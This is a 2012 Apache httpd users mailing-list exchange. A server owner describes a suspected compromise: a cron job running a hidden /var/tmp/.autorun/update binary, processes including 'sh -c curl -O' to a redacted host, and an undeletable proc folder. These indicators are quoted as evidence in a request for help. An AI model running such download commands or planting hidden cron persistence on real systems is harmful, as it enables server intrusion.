From: luisa2...@hotmail.com
To: users@httpd.apache.org
Subject: RE: [users@httpd] attack on apache
Date: Wed, 11 Jan 2012 16:15:14 -0300
> Date: Mon, 9 Jan 2012 17:30:21 +0000
> From: tevans...@googlemail.com
> To: users@httpd.apache.org
> Subject: Re: FW: [users@httpd] attack on apache
>
> On Mon, Jan 9, 2012 at 5:20 PM, Luisa Ester Navarro
> <luisa2...@hotmail.com> wrote:
> >
> >
> > ________________________________
> >
> > I didnĀ“t have any cronjobs but when I detected the attack I saw one in
> > /var/spool/cron
> > My logifle says
> > User apache:
> >
> > /var/tmp/.autorun/update >/dev/null 2>&1: 2162 Time(s)
> >
> > personal crontab deleted: 56 Time(s)
> >
> > personal crontab listed: 1 Time(s)
> >
> > personal crontab replaced: 1 Time(s)
> >
> > Thanks
> >
>
> Google tells me that this is output from a cpanel perl script -
> probably a crontab editor. crontabs are not evidence of an attack.
>
> You need to show more details of what you think is happening, and why
> you think it is malicious.
> Cheers
Tom
I think it is an attack because I found this commands running on my server
(with owner apache)
/usr/local/apache/bin/httpd - DSFSL
sh -c curl -O http://xxxx
I also found a folder proc in /var/named/chroot. this folder is the same as
/proc, is updated with the original /proc and I can't delete.
In /var/log/httpd/error_log I see hink like this
sh: del comand no found
sh: xx Permission denied
I need help !
Thanks
Luisa
